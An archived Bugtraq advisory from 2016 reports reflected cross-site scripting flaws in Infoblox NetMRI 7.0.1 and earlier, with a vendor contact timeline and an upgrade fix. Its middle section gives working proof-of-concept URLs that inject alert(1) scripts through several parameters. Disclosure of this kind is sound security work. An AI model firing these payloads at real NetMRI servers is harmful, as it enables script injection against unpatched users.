lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 6 Sep 2016 20:18:20 GMT
From: alex_haynes@...look.com
To: bugtraq@...urityfocus.com
Subject: Infoblox Cross-site scripting vulnerabilities

Exploit Title: Infoblox Cross-site scripting vulnerabilities
Product: Infoblox Network Automation
Vulnerable Versions: 7.0.1 and all previous versions 
Tested Version: 6.9.2
Advisory Publication: 06/09/2016
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: NONE
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------

Vendor:
Infoblox

Product & Version:
Infoblox Network Automation v7.0.1

Vendor URL & Download:
https://www.infoblox.com/products/network-automation

Product Description:
"Infoblox also offers a complementary, powerful network automation platform which enables discovery, switch port management, network change configuration and compliance management for multi-vendor network devices. Automation cuts down administrator workload and reduces risk of network outages due to improper configurations or changes."

(2) Vulnerability Details:
--------------------------
There are many cross-site scripting vulnerabilities present in netmri. Many parameters are vulnerable from the login page itself to other pages once the user is authenticated. Proof of concept examples below:
 
“_formstack” variable vulnerable to XSS.
 
https://NETMRISERVER/netmri/config/userAdmin/login.tdf?_formStack=%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&mode=CHANGE-FORM&eulaAccepted=Accept&TrustToken=%0D&weakPassword=false&skipjackUsername=test&skipjackPassword=test&x=0&y=0
 
“skipjackPassword” variable and “skipjackUsername” variable are also vulnerable in the same URL.
 
“DefaultTitle” parameter is vulnerable in the URL below (this page is from after authentication):
 
https://NETMRISERVER/netmri/config/index.tdf?defaultTitle=9ba35%3Cimg/src=x%20onerror=alert%281%29%3E%22%3Edf522&defaultMenu=Collection_and_Groups&defaultAccordion=Setup&defaultPage=/webui/settings/groups%3FuseTab%3Ddev
 
The “defaultAccordion”, “defaultMenu” and “defaultPage” parameters are also vulnerable.
 
In the help Section, the “helpId” parameter is vulnerable:
 
https://NETMRISERVER/netmri/help/netmri_help/netmri_help.tdf?useContext=1&helpId=networkanalysis_issues_issuesbytype58626%27%3balert%281%29%2f%2f390




(3) Advisory Timeline:
----------------------
25/01/2016 - First Contact informing vendor of vulnerabilities. No response.
01/02/2016 - Follow up e-mail to inform them of vulnerabilities. Response requesting further information.
01/02/2016 - Information on vulnerabilities sent to vendor. No response.
08/02/2016 - follow up e-mail requesting update. Vendor responds asking us to open a support ticket.
12/02/2016 - Infoblox products out of support so cannot raise ticket. write to vendor to explain situation. No response.
24/02/2016 - Follow up with vendor on vulnerabilities requesting an update.
10/03/2016 - Final follow up to vendor requesting an update. Vendor responds and opens support ticket for vulnerabilities, mentioning they will look into vulnerabilities.
14/03/2016 - vendor responds saying they are able to reproduce vulnerabilities
17/03/2016 - Vendor responds saying some of the vulnerabilities are already fixed in version 7.0.4 but cannot confirm which ones.
05/04/2016 - Request update from vendor on status of vulnerabilities.
12/04/2016 - Vendor responds saying CSRF already fixed in 7.0.1, XSS and HTTP Splitting to be fixed in upcoming 7.1.1 - expected release in summer.
30/06/2016 - Patch 7.1.1 released
06/09/2016 - Public disclosure


(4)Solution:
------------
Upgrade to Version 7.1.1


(5) Credits:
------------
Discovered by Alex Haynes

Powered by blists - more mailing lists